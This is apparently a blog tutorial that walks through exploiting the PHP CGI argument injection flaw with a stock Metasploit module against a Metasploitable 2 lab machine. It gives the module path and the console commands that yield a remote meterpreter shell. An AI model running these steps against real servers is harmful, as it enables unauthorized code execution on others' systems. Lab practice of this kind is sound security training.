PHP CGI ARGUMENT INJECTION using Metasploit
Hello Everyone,
Today i would like to demonstrate How we can do PHP CGI ARGUMENT INJECTION using Metasploit.
REFERENCES
So, If have you Don't know about metasploit then check my then tutorials:-
==>Metasploit Playlists<==
So, If you already know about Metasploit then lets start.
The module that we are going to use is :-exploit/multi/http/php_cgi_arg_injection
About this vulnerablity-by Rapid7
So they say-"When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary.""
This means that if we try to pass/add some parameter we can run some arbitrary code using it.
So lets try to exploit it.
We are going to use Metasploitable 2.
1. Open Metasploit console.
![[Image: H8B4rmb.png]](https://i.imgur.com/H8B4rmb.png)
2. Then just select php_cgi_arg_injection module.
Code:
msf> use exploit/multi/http/php_cgi_arg_injection ![[Image: 8a6B1oA.png]](https://i.imgur.com/8a6B1oA.png)
3. Now just set the options and exploit.
Quote:msf exploit(php_cgi_arg_injection) > set RHOST 172.16.18.134RHOST => 172.16.18.134msf exploit(php_cgi_arg_injection) > exploit
And done we got a meterpreter session.
![[Image: rczIdmz.png]](https://i.imgur.com/rczIdmz.png)
Done :D we got meterpreter session
![[Image: 3ZoFrbK.png]](https://i.imgur.com/3ZoFrbK.png)
If you will like this,
![[Image: 1vmW1XH.png]](https://i.imgur.com/1vmW1XH.png)
If you will like this,
Post a Comment:
Please tell us if we have done anything wrong :) and please share our website if you like.